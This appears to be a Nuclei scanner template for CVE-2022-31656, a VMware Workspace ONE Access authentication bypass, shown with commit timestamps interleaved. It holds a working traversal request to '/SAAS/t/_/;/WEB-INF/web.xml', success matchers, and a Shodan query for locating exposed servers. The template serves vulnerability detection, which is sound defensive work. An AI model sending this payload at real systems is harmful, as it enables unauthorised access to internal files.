2022-08-10 12:39:07 +00:00
id : CVE-2022-31656
2022-08-10 12:24:02 +00:00
info :
2023-01-16 17:41:15 +00:00
name : VMware - Local File Inclusion
2022-08-10 12:24:02 +00:00
author : DhiyaneshDk
2022-08-12 17:57:05 +00:00
severity : critical
2022-08-10 12:24:02 +00:00
description : |
2023-01-16 17:41:15 +00:00
VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
2022-08-10 12:24:02 +00:00
reference :
- https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
- https://www.vmware.com/security/advisories/VMSA-2022-0021.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31656
2022-08-12 17:57:05 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-31656
cwe-id : CWE-287
2022-08-10 12:24:02 +00:00
metadata :
shodan-query : http.favicon.hash:-1250474341
2022-08-12 17:57:05 +00:00
verified : "true"
2022-08-10 12:24:02 +00:00
tags : cve,cve2022,vmware,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "<web-app"
2022-08-11 23:00:48 +00:00
- "<servlet-name>"
2022-08-10 12:24:02 +00:00
condition : and
- type : word
part : header
words :
- "application/xml"
- type : status
status :
- 200
2023-01-16 17:41:15 +00:00
# Enhanced by mp on 2023/01/15